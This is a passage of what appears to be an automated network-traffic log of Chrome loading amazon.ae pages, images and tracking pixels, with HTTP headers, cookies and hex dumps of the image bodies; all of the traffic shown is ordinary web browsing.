                                                                                                                                                                                                                                                                      set-cookie: session-token=nHzoAHSulYKhFQ2qrFvCrZ2PAQai1qQX4i/tmLW2Mz6+CdZ1O2enPZVrz/OfbY5ZDE4YVQZX3Uu94CDiIlQVfauyxUtoAZ8Y5v2hPYonMykIQrmoxj7ssZcZJGPRcJ074EvGfpgs2S6Tm/UqktL2zafoyWToUgfEEeBZw1mcjRo8iwaFohdfshBWIfEfuf2y2KWXsX+YdldQyipOoYIRHCL03Es1/Sn7RRWBJm7qviHRQ+wnizSylhWwX8i3v7jorQYjM4vQHAvD+FHDZsvtm3tmJ1ew3kZSdnaFGSKhEOplBE/UYd0/ZZUIh/cqvRXL8PD3so3P6lvNmOZccZx/Owf/R0LQ8Npu; Domain=.amazon.ae; Expires=Thu, 21-Aug-2025 18:28:45 GMT; Path=/; Secure
                                                                                                                                                                                                                                                                      Content-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/
                                                                                                                                                                                                                                                                      Accept-CH-Lifetime: 86400
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      content-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/
                                                                                                                                                                                                                                                                      Accept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-version
                                                                                                                                                                                                                                                                      X-XSS-Protection: 1;
                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                      Via: 1.1 05f3f10124c24e16ce708020c976c78a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P2
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: yHfJae09X_ZwMqtcAFl9Egu1qIqr-A9_fuUU8zeOzgTkR2VaHw7xxA==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC4772INData Raw: 31 32 39 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 68 74 6d 6c 22 3a 22 3c 61 20 64 61 74 61 2d 61 2d 6d 6f 64 61 6c 3d 5c 22 7b 26 71 75 6f 74 3b 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 2f 61 66 2f 66 65 65 64 62 61 63 6b 2d 66 6f 72 6d 3f 70 6c 3d 25 37 42 25 32 32 61 64 50 6c 61 63 65 6d 65 6e 74 4d 65 74 61 44 61 74 61 25 32 32 25 33 41 25 37 42 25 32 32 70 61 67 65 55 72 6c 25 32 32 25 33 41 25 32 32 61 48 52 30 63 48 4d 36 4c 79 39 33 64 33 63 75 59 57 31 68 65 6d 39 75 4c 6d 46 6c 4c 7a 38 25 33 44 25 32 32 25 32 43 25 32 32 61 64 45 6c 65 6d 65 6e 74 49 64 25 32 32 25 33 41 25 32 32 61 70 65 5f 47 61 74 65 77 61 79 5f 72 69 67 68 74 2d 32 5f 64 65 73 6b 74 6f 70 5f 70 6c 61 63 65 6d 65 6e 74 25 32 32 25 32 43 25 32 32 70 61
                                                                                                                                                                                                                                                                      Data Ascii: 129c{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22adElementId%22%3A%22ape_Gateway_right-2_desktop_placement%22%2C%22pa
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      87192.168.2.549817151.101.193.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC471OUTGET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924077_186x116_1X_en_AE._SY116_CB566504241_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 5795
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 1efb14f2-f79e-461b-8c2d-1e01a8d9c597
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 09 Aug 2024 20:38:54 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Expires: Thu, 04 Aug 2044 20:48:29 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 429993
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:44 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kcgs7200037-IAD, cache-ewr-kewr1740071-EWR
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 02 02 02 03 02 03 03 03 03 04 06 05 05 04 05 05 08 06 04 06 05 07 05 05 05 07 05 07 07 05 06 07 06 06 08 07 06 06 07 08 06 07 08 0b 08 09 08 0a 08 08 0a 08 0b 08 0b 0b 0b 0b 0c 0d 0b 07 0c 11 01 03 03 02 03 03 03 04 03 03 06 0a 07 05 08 0b 09 04 08 0d 0b 0d 08 0b 0b 0b 0b 08 0e 0b 0d 0a 0b 06 0b 0b 08 0a 0a 08 08 09 08 09 0b 08 0b 0b 0b 05 08 0b 0a 07 0f 08 08 07 0b 0a 0c 0a 07 0b 0e ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 39 00 00 01 04 03 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 07 08 01 05 06 04 09 0a 01 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 03 04 06 07 02 05 08 01 09 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fa c8 04 e3 9d d2 db 88 f3
                                                                                                                                                                                                                                                                      Data Ascii: JFIFt"9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 7b 56 1e c9 f3 70 26 ef cc 1c e2 ec b2 18 42 90 9c 94 d8 b9 63 47 09 87 dd 60 73 94 05 63 21 db 8d 96 4a ce bf 08 f1 fa ef f2 b3 a9 60 07 56 a9 c4 ab 56 8d a4 64 ef b5 01 b8 fa 0b d5 ff c4 00 29 11 00 02 02 01 02 05 04 01 05 00 00 00 00 00 00 00 02 03 01 04 00 05 06 07 11 12 13 20 08 10 22 31 14 15 17 21 30 32 ff da 00 08 01 02 01 01 08 00 c2 9e 43 33 17 f8 bf bb 53 7a ca 95 5f 77 6f 9b 4a 59 a5 1b eb 88 30 db 15 d6 ae 20 6f ef d4 d7 a6 5a 2d e3 be 41 60 67 a7 6f be 22 5f 90 28 d7 38 a5 bc 74 97 29 2b e1 36 fd d7 77 0b f5 20 d5 f2 ae 92 0c 5f 5b f2 63 9c 4c 65 af 4d d5 ac d8 6b f2 af 02 df 4f b2 29 fd 83 74 bd 96 71 5c 0a 83 b7 36 5a ff 00 4e f5 ac ac 13 62 bf a6 a6 21 10 aa cf f4 b4 bb 13 06 ed 97 c2 34 ec c6 5b 35 54 a9 2f 6f 4e 47 d7 8b 9d 0b 51 1e 3d
                                                                                                                                                                                                                                                                      Data Ascii: {Vp&BcG`sc!J`VVd) "1!02C3Sz_woJY0 oZ-A`go"_(8t)+6w _[cLeMkO)tq\6ZNb!4[5T/oNGQ=
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: ac f1 38 86 3e 03 6f eb 3c 60 12 26 77 35 b8 4a d4 77 27 45 03 e9 6b c1 8f 36 93 1a d4 60 9e d2 ea a5 be 52 04 7b 4a ac ac 9b 05 83 d6 bc f5 b8 42 a8 47 65 aa e6 04 1a e8 43 83 5e 99 7e 43 42 36 05 6e 94 d8 54 70 4b d5 f7 34 5a fc 8e f7 e0 67 d2 14 0d c4 44 36 0e 11 d8 a9 e0 24 cf d4 89 e8 99 8f c3 41 7b 8c ff 00 0d 1e 91 ea 92 27 fd a8 f3 38 b5 fe b1 5b 77 ad 8d 6f b8 06 10 99 96 ac 9b 9a cb 87 ba 0c 77 5b e5 c3 dd 03 25 83 5c 93 9b ff c4 00 28 10 01 00 01 03 02 04 07 01 01 01 00 00 00 00 00 00 01 11 00 21 31 41 51 10 61 71 81 20 30 91 a1 b1 d1 f0 c1 f1 e1 ff da 00 08 01 01 00 01 3f 21 e0 d3 4d f6 4d 2e 59 b2 ef e0 9a 61 95 44 bc f4 0e 9f de 95 c8 7e f4 ae 4b f7 a5 7f a9 fa af f4 3f 55 ca 7a fe ab 94 f5 fd 56 4b 2d cf f5 5f e8 7e aa 2f b3 f5 4a 1b 81 ef
                                                                                                                                                                                                                                                                      Data Ascii: 8>o<`&w5Jw'Ek6`R{JBGeC^~CB6nTpK4ZgD6$A{'8[wow[%\(!1AQaq 0?!MM.YaD~K?UzVK-_~/J
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 59 d5 96 4a ae a5 97 2a ba 11 86 42 c0 6f 2e a1 97 4d 8f 51 8a 12 92 c3 71 04 0a 8e 4a b1 46 f5 bb 1c 0c bd e8 de 25 25 52 ab 2a b9 57 d1 a1 e8 a3 79 c8 65 db c6 ed 59 c8 67 71 94 22 a1 c9 65 95 01 92 e1 f6 cf 4c 5d 9c 43 c9 4c ab 07 84 8f f9 2d 24 c0 33 ba 15 95 34 c2 76 60 c0 a7 42 dd 28 05 00 2a e8 0b 4e c1 10 42 15 bd 8b 76 f7 7e 4a d8 f4 98 37 d5 a7 50 08 43 5a 1a 63 d8 31 a5 f9 d9 26 c6 6a d3 0c 07 fc 7f 59 0a cc d0 12 7d c4 95 14 01 62 58 a4 00 f3 77 00 c1 0e c2 1a 74 0d 42 f9 81 89 9e b1 27 c1 fe 6f b1 cf e1 11 2a 69 08 3a 7d 81 57 69 a7 09 21 68 60 d8 34 0d 83 da 2a 13 4d 62 30 ef 4c cb 7e dc 59 6e 9a 21 c7 40 68 95 2a da c6 f6 4b 38 3f 41 bc 6d cb 55 ca b2 57 dd 83 5f 86 c8 96 ca cc 2b 53 96 0f 61 3b 6b c8 21 2b 25 ad 02 b4 45 51 a6 73 a8 82 ed
                                                                                                                                                                                                                                                                      Data Ascii: YJ*Bo.MQqJF%%R*WyeYgq"eL]CL-$34v`B(*NBv~J7PCZc1&jY}bXwtB'o*i:}Wi!h`4*Mb0L~Yn!@h*K8?AmUW_+Sa;k!+%EQs
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC283INData Raw: e1 6c 66 a5 6d 05 59 55 d6 11 ba 3f 4e 33 1a 69 cc 53 25 98 4c a3 90 45 0d ba ab a3 31 4b d5 21 d6 a0 d6 58 0d e3 ca da 6a 63 b2 c2 66 4c 4e b3 44 33 53 1a 09 31 d9 22 8e fb e4 33 8f f3 c7 66 e5 99 d4 32 09 69 9d 08 35 93 19 85 14 12 66 9a 4d e2 7f 66 32 11 92 89 05 e6 d8 e5 eb a7 4b d1 69 07 ce 7a a2 72 bc f4 f5 8d be 1f a9 82 c0 00 28 0a 20 6c 52 63 7d d8 cc 3d 4f 71 a2 28 d2 26 e0 23 77 75 05 c0 78 96 b2 e5 d2 4a e2 d7 60 22 a0 0b 20 02 80 5a 0d a3 ac 4a 45 9a c4 cf 62 00 04 0c 45 fd c6 c1 46 9b cc f0 5c 07 ae 1e 2c 22 c9 94 f6 a9 a7 ee 7f c0 8b 14 02 f1 c4 96 8b 42 79 43 05 bb d6 3e 6b 55 25 8e 77 9e 4b eb 4e 70 6a 4d a7 c4 9a 4a 8c 1c 88 f7 6a 2d 11 bc 68 a7 08 34 21 4d 31 30 d4 96 a0 cc 63 cb f2 76 63 16 26 e2 0b 80 d9 d7 89 e7 f0 3e aa 0c 30 87 83
                                                                                                                                                                                                                                                                      Data Ascii: lfmYU?N3iS%LE1K!XjcfLND3S1"3f2i5fMf2Kizr( lRc}=Oq(&#wuxJ`" ZJEbEF\,"ByC>kU%wKNpjMJj-h4!M10cvc&>0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      88192.168.2.54981618.239.85.2234432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC411OUTGET /images/S/al-eu-726f4d26-7fdb/b0920667-ac43-442e-a652-750147a6db82.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC760INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 39516
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 0fd27b01-5385-4286-ac07-7fe05b79c898
                                                                                                                                                                                                                                                                      Date: Wed, 30 Aug 2023 08:47:06 GMT
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 11 Jan 2022 14:48:33 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-777,/images/S/al-eu-726f4d26-7fdb/b0920667-ac43-442e-a652-750147a6db82
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-777 /images/S/al-eu-726f4d26-7fdb/b0920667-ac43-442e-a652-750147a6db82
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Via: 1.1 cf275c3404dbe6c17a831886bac6a64c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 41347
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: J8PvhLDgAea0v3nOxOFvWVTywDUhSxuqVnbUeHQQee0TgassAbXQNw==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 01 01 01 01 01 01 01 01 01 01 02 01 01 01 02 02 02 01 01 02 02 02 02 02 02 02 02 02 03 02 03 03 03 03 02 03 03 04 04 04 04 04 03 05 05 05 05 05 05 07 07 07 07 07 08 08 08 08 08 08 08 08 08 08 ff db 00 43 01 01 01 01 02 02 02 05 03 03 05 07 05 04 05 07 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 ff c0 00 11 08 00 fa 01 2c 03 00 11 00 01 11 01 02 11 01 ff c4 00 1f 00 01 00 00 06 03 01 01 00 00 00 00 00 00 00 00 00 00 05 06 07 08 09 0a 03 04 0b 02 01 ff c4 00 54 10 00 00 05 03 03 03 02 04 03 05 03 05 0a 0c 07 00 01 02 03 04 05 00 06 07 08 11 12 09 13 21 14 31 0a 22 41 51 15 32 61 16
                                                                                                                                                                                                                                                                      Data Ascii: JFIFCC,T!1"AQ2a
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1514INData Raw: 62 33 d6 ce 6d 64 ad e7 26 46 71 75 9b 9b d5 09 df b4 64 0a a1 c0 c4 20 89 ce 63 6d c4 04 36 0a e6 7c 7b 15 9e 2a 39 46 17 24 b2 d0 e9 21 fd 68 bc 60 1d ac c7 3a ce bd ce c0 0e 36 3b ac be 9a 16 ba 46 f5 c1 ad 92 fb 5b 8f bc 0d 94 cd 98 8b 78 a9 3e b4 8e 0a 3d b0 17 cd c2 c1 bb a7 4f 16 51 1f da 87 2c 8e 97 69 23 30 fc 43 f7 20 dc 48 9e c3 c7 ea 1b fe 6d ea d5 92 0d 08 a6 0c c5 ba ef 57 8d c4 00 01 ea 43 af 72 1f a7 b5 aa e7 9f 2f 05 3f 11 eb 35 de 0d 3a 88 ff 00 15 bc 2f c9 62 d6 ff 00 65 90 5a 5c 2e 4d 92 9b ca 25 72 2f b8 ac ac a8 38 ef a8 50 1f 72 99 c7 e6 27 9f 02 51 db ed 5d 75 97 27 c3 5f 4c 3d 44 b0 c4 3e e5 ac 3d c3 81 f3 dd 60 b5 6d 98 3f f7 97 d5 e2 a4 9a bf aa 54 a2 25 11 28 89 44 5b 24 57 cb 55 b9 d6 3b b5 a9 9c 23 49 10 a6 20 b6 9f 15 dc 93
                                                                                                                                                                                                                                                                      Data Ascii: b3md&Fqud cm6|{*9F$!h`:6;F[x>=OQ,i#0C HmWCr/?5:/beZ\.M%r/8Pr'Q]u'_L=D>=`m?T%(D[$WU;#I
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC16384INData Raw: 60 53 a9 b9 84 07 b6 5f 71 1d b6 0d ab 33 c3 32 f5 0d 14 8f 7d 3c 6d 8c c9 6d 5a 45 af 6b db 61 b7 33 f1 56 f9 aa a4 90 00 e2 4d b8 5d 4a 75 79 54 e9 44 4a 22 51 12 88 ae b2 f6 d6 46 66 bc 19 ad 1c d1 f3 5b 39 93 80 12 ac 31 48 a8 93 83 10 43 db be ba 8a 9c a3 fa a6 25 1a d3 d8 07 41 d8 15 0b c3 dc d7 4c e1 f7 c8 23 fc a0 00 7d f7 57 fa ac c7 53 20 b0 b3 47 82 b5 53 9c ea 9c ea 28 71 51 45 04 4c a2 86 11 13 18 c2 3b 88 88 8f b8 8d 6e 06 b4 01 61 c1 58 49 5f 35 15 05 3c 58 99 26 f8 c6 4f e4 e5 6c 3b 89 7b 66 4e 61 92 b1 ef 9f b7 e0 0a 8b 55 8e 45 0c 52 18 e5 30 90 db a6 02 07 2e c6 0f a0 85 5d 30 ac 6a aa 85 e5 d0 38 b1 ce 16 24 77 1f a7 98 dd 58 f1 ec b7 43 89 c6 d6 55 30 48 d6 b8 38 03 c2 e2 e3 df c7 81 d8 f3 0a b1 e9 62 ef b7 6d 8c dc d3 22 df b3 a9 a0
                                                                                                                                                                                                                                                                      Data Ascii: `S_q32}<mmZEka3VM]JuyTDJ"QFf[91HC%AL#}WS GS(qQEL;naXI_5<X&Ol;{fNaUER0.]0j8$wXCU0H8bm"
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC5234INData Raw: a3 9d 21 e1 ed bd 58 a5 ad 65 be dc 66 37 79 ea 88 81 7f f0 ab bc 59 92 a5 a2 ef 17 03 be cb 55 5b a7 50 10 19 f3 27 e6 bc ac c2 05 ac f3 8b de e0 b8 12 8a 48 ea 2c b8 45 90 d2 4b a0 89 d2 6e 90 17 bc 73 b7 ed 99 03 18 3e 5d c0 40 04 de 03 60 f4 92 ec 4a b7 13 f5 ba b7 18 5f 31 12 b9 ad dc 76 80 76 8d 67 70 d6 1b b5 c6 c0 b8 0d ec 17 ea 0b a0 ac 00 41 93 70 ea 58 de 69 c5 34 51 89 58 dd 22 ef 6b 41 73 4b 8f b2 cd 57 2e b7 b4 0d 89 02 eb 64 ce 93 56 98 5b fa 34 b7 65 44 9c 0d 7f 5d 13 d2 a9 9f ea 70 6a 72 40 98 c3 fc 85 91 8a 6f d4 2b e8 cf a2 ce 1b d4 e5 46 c9 ff 00 76 47 bb e0 43 3f f5 5f 1c bf 68 be 3c 2a fa 49 7c 37 fe cd 04 4c f2 b8 32 ff 00 fd 97 f7 ad 59 7e 2e 2c 9a e2 4f 51 7a 3f c3 22 a1 81 bd 9b 61 ca 5d 66 6f b8 f0 05 ae eb 85 66 1b 80 7d f8 c1
                                                                                                                                                                                                                                                                      Data Ascii: !Xef7yYU[P'H,EKns>]@`J_1vvgpApXi4QX"kAsKW.dV[4eD]pjr@o+FvGC?_h<*I|7L2Y~.,OQz?"a]fof}


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      89192.168.2.54981334.251.2.354432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC589OUTGET /1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:APAVCQJMFK78QJEV1PMZ$uedata=s:%2Frd%2Fuedata%3Fstaticb%26id%3DAPAVCQJMFK78QJEV1PMZ:0 HTTP/1.1
                                                                                                                                                                                                                                                                      Host: fls-eu.amazon.ae
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC176INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:45 GMT
                                                                                                                                                                                                                                                                      Content-Type: image/gif
                                                                                                                                                                                                                                                                      Content-Length: 43
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      x-amzn-RequestId: fdf7aa5f-66ff-4706-aa2e-c8c54f4205f1
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                                                                                                                      Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      90192.168.2.54981952.94.222.1274432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC773OUTGET /x/px/RIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d/v/%7B%22wh%22:907,%22ww%22:1280,%22sx%22:0,%22sy%22:0,%22ah%22:19,%22aw%22:300,%22top%22:519,%22left%22:959.984375,%22v%22:%7B%22p%22:50,%22t%22:1,%22def%22:%22iab%22%7D,%22ptv%22:1724264922.216,%22ttv%22:1724264922.216%7D HTTP/1.1
                                                                                                                                                                                                                                                                      Host: aax-eu.amazon.ae
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC330INHTTP/1.1 200
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:45 GMT
                                                                                                                                                                                                                                                                      Content-Type: image/gif
                                                                                                                                                                                                                                                                      Content-Length: 43
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      x-amz-rid: BWZZRGSYMJBJXV0HXTCR
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                      Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 f0 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                      Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      91192.168.2.54981818.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC695OUTGET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Laundry_186x116_2X_en_AE._SY116_CB566996700_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC943INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 3545
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: b584d196-7efc-4e39-b02e-cc3e92f36061
                                                                                                                                                                                                                                                                      Date: Mon, 19 Aug 2024 05:33:43 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
